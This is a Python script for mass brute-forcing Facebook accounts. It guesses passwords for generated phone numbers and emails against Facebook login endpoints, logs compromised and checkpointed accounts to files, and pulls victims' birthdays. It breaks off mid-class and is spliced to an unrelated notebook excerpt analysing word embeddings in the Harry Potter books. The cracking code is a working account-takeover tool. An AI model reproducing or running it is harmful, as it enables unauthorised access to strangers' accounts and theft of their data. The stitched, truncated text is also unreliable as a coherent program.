data = []
print((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit"))
kode=str(input(p+" ["+k+"•"+m+"•"+p+"] Example : 92037\n"+p+" ["+k+"•"+m+"•"+p+"] Input Number: "))
exit((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit")) if len(kode) < 5 else ''
exit((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit")) if len(kode) > 5 else ''
jml=int(input(p+" ["+k+"•"+m+"•"+p+"] Amount : "))
[data.append({'user': str(e), 'pw':[str(e[5:]), str(e[6:])]}) for e in [str(kode)+''.join(['%s'%(randint(0,9)) for i in range(0,7)]) for e in range(jml)]]
print(p+" ["+k+"•"+m+"•"+p+"] Crack Started, Please Wait...\n")
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as th:
{th.submit(brute, user['user'], user['pw']): user for user in data}
input(p+"\n [BACK]"+p)
menu()
def random_email():
data = []
nama=input(p+" ["+k+"•"+m+"•"+p+"] Target Name : ")
domain=input(p+" ["+k+"•"+m+"•"+p+"] Choose Domain [G]mail, [Y]ahoo, [H]otmail : ").lower().strip()
list={
'g':'@<EMAIL>',
'y':'@yahoo.com',
'h':'@hotmail.com'
}
exit(("\033[1;37m ["+k+"•"+m+"•"+p+"] Fill In The Correct")) if not domain in ['g','y','h'] else ''
jml=int(input(p+" ["+k+"•"+m+"•"+p+"] Amount : "))
setpw=input(p+" ["+k+"•"+m+"•"+p+"] Set Password : ").split(',')
print("\033[1;37m ["+k+"•"+m+"•"+p+"] Crack Started, Please Wait...\n")
[data.append({'user': nama+str(e)+list[domain], 'pw':[(i) for i in setpw]}) for e in range(1,jml+1)]
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as th:
{th.submit(brute, user['user'], user['pw']): user for user in data}
input("\n\033[1;37m [BACK]")
menu()
def brute(user, passs):
try:
for pw in passs:
params={
'access_token': '<PASSWORD>',
'format': 'JSON',
'sdk_version': '2',
'email': user,
'locale': 'en_US',
'password': pw,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
}
api='https://b-api.facebook.com/method/auth.login'
response=requests.get(api, params=params)
if re.search('(EAAA)\w+', str(response.text)):
print('\x1b[0;32m * --> %s • %s '%(str(user), str(pw)))
break
elif 'www.facebook.com' in response.json()['error_msg']:
print('\x1b[0;33m * --> %s • %s '%(str(user), str(pw)))
break
except: pass
### PASSWORD ###
def generate(text):
results=[]
global ips
for name in text.split("<=>"):
if len(name)<3:
continue
else:
name=name.lower()
if len(name)==3 or len(name)==4 or len(name)==5:
results.append(name)
results.append(name+"123")
results.append(name+"123456")
else:
results.append(name)
results.append(name+"123")
results.append(name+"123456")
if "indonesia" in ips:
results.append("sayang")
results.append("anjing")
results.append("bismillah")
results.append("kontol")
results.append("freefire")
results.append("bangsat")
results.append("bajingan")
return results
### MODULE CRACK ###
def mbasic(em,pas,hosts):
r=requests.Session()
r.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://mbasic.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def f_fb(em,pas,hosts):
global ua
r=requests.Session()
r.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://free.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def touch_fb(em,pas,hosts):
global ua,touch_fbh
r=requests.Session()
r.headers.update({"Host":"touch.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://touch.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://touch.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":<PASSWORD>}#touch fb
def m_fb(em, pas, hosts):
r = requests.Session()
r.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = r.get('https://m.facebook.com/')
b = bs4.BeautifulSoup(p.text, 'html.parser')
meta = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for i in b('input'):
if i.get('value') is None:
if i.get('name') == 'email':
data.update({'email': em})
elif i.get('name') == 'pass':
data.update({'pass': <PASSWORD>})
else:
data.update({i.get('name'): ''})
else:
data.update({i.get('name'): i.get('value')})
data.update({'fb_dtsg': meta, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
r.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = r.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if 'c_user' in r.cookies.get_dict().keys():
return {'status': 'success', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
if 'checkpoint' in r.cookies.get_dict().keys():
return {'status': 'cp', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
return {'status': 'error', 'email': em, 'pass': pas}
return
def touch_fb(em,pas,hosts):
global ua,touch_fbh
r=requests.Session()
r.headers.update({"Host":"touch.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://touch.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://touch.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}#touch fb
### BRUTE CRACK ###
class crack:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(35).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=mbasic(fl.get("id"),
i,"https://mbasic.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i,)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crackttl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(35).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=mbasic(fl.get("id"),
i,"https://mbasic.facebook.com")
if log.get("status")=="cp":
try:
ke=requests.get("https://graph.facebook.com/"+fl.get("id")+"?access_token="+open("login.txt","r").read())
tt=json.loads(ke.text)
ttl=tt["birthday"]
except:pass
print("\r\x1b[0;33m * --> %s • %s • %s \x1b[0m "%(fl.get("id"),i,str(ttl)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s • %s\n"%(fl.get("id"),i,str(ttl)))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
if fl.get("id") in open("ok.txt").read():
break
else:
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crekm:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=m_fb(fl.get("id"),
i,"https://m.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crekmttl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=m_fb(fl.get("id"),
i,"https://m.facebook.com")
if log.get("status")=="cp":
try:
ke=requests.get("https://graph.facebook.com/"+fl.get("id")+"?access_token="+open("login.txt","r").read())
tt=json.loads(ke.text)
ttl=tt["birthday"]
except:pass
print("\r\x1b[0;33m * --> %s • %s • %s \x1b[0m "%(fl.get("id"),i,str(ttl)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s • %s\n"%(fl.get("id"),i,str(ttl)))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
if fl.get("id") in open("ok.txt").read():
break
else:
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class tofbe:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=touch_fb(fl.get("id"),
i,"https://touch.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class tofbettl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] | |
sent = [str(sent) for sent in nlp(clean_text).sents] #Split the whole text into sentences
#print(len(sent))
#print(sent)
clean_sent = clean_documents(sent) #Apply clean_document function to the sentences
clean_sent = expandContractions(clean_sent) #Apply expandContraction function to expand text contractions
#print(clean_sent)
tokens = tokenizer(clean_sent) #Tokenize the sentences and retrieve only relevant tokens
instances = Instances(tokens) #Form the instances back
#print(tokens)
#print(instances)
data = {'Book': ['Harry Potter %s' %book for i in tokens],
'Tokens': [token for token in tokens],
'Instances':[inst for inst in instances]}
df = pd.DataFrame.from_dict(data)
corpustot = corpustot.append(df)
corpustot.head()
# In[5]:
corpustot.info()
corpustot = corpustot.reset_index(drop=True)
corpustot.tail()
# ## 2. Analysis
# <a id="analysis"></a>
# ###### Description of the research questions
# Investigate the content of Harry Potter Books by analyzing their text. The research aims at giving a general words and topics analysis for the whole saga. In particular it will put a focus on the change in the characters co-occurrences along the books, and at understanding the dynamics of three main topics between the first and the last book.
#
# - What are the most similar words to a given based on HP corpus?
# - What are the most frequent words-bigrams in HP?
# - Does the Harry-Ron/Harry-Hermione/Hermione-Ron occurence frequency changes along the books?
# - What is the PMI measure?
# - Are there any relevant distinct topics in HP?
# - What is the dynamic of some topics along the different books?
# ### 2.1- WORDS EMBEDDINGS
# <a id="word-embeddings"></a>
# In[74]:
'''Create dense word embeddings and investigate the similarities among different words in the Harry Potter Saga
These word embeddings are initially performed on the whole corpus without distinction between the different books.
Then there are two word embeddings for Book1 and Book7 and we look at the changes in the most similar
terms for some words they share'''
toklist = corpustot['Tokens'].to_list() #List of the Tokens
#To perform a more accurate analysis, consider the text keeping the most relevant bigrams
phrases = Phrases(toklist)
bigram = Phraser(phrases)
bigrams = list(bigram[toklist])
#print(len(big))
# In[79]:
# TRAIN THE WORD EMBEDDINGS MODEL
# Train the word-embedding model on the bigram-merged corpus.
# NOTE(review): the original passed workers=-1. Unlike scikit-learn, gensim's
# Word2Vec does not interpret -1 as "all cores": a non-positive worker count
# spawns no training threads, so the vectors stay at their random
# initialisation -- confirm against the gensim Word2Vec documentation.
import multiprocessing

w2v_model = Word2Vec(size=300,        # dimensionality of the word vectors
                     window=15,       # context window around the target word
                     sample=0.00001,  # aggressive downsampling of very frequent words
                     iter=1000,       # training epochs
                     negative=5,      # negative samples per positive example
                     min_count=100,   # ignore words rarer than this
                     workers=max(1, multiprocessing.cpu_count() - 1),
                     hs=0)            # negative sampling, not hierarchical softmax
w2v_model.build_vocab(bigrams)
w2v_model.train(bigrams, total_examples=w2v_model.corpus_count, epochs=w2v_model.epochs)
# In[80]:
w2v_model.wv.most_similar(positive=["harry"])
# In[82]:
w2v_model.wv.doesnt_match(('<NAME>'.split()))
# In[83]:
w2v_model.wv.doesnt_match('<NAME>'.split())
# In[84]:
w2v_model.wv.most_similar_to_given('harry', ['snape', 'gryffindor','hermione'])
# In[85]:
def similarities(word1, word2, word3):
    """Solve the analogy 'word1 : word2 = word3 : ?' on the trained embeddings.

    Queries the module-level ``w2v_model`` with vector arithmetic
    (word1 + word2 - word3) and prints the best-matching fourth word.
    """
    # Fixes relative to the original: the local result no longer shadows the
    # function's own name, and the fragile .format(**locals()) idiom is
    # replaced by explicit format arguments. Printed text is unchanged.
    matches = w2v_model.wv.most_similar(
        positive=[word1, word2],
        negative=[word3]
    )
    word4 = matches[0][0]
    print('{word1} is related to {word2}, as {word3} is related to {word4}'.format(
        word1=word1, word2=word2, word3=word3, word4=word4))
similarities('hermione', 'read', 'harry')
# In[15]:
'''
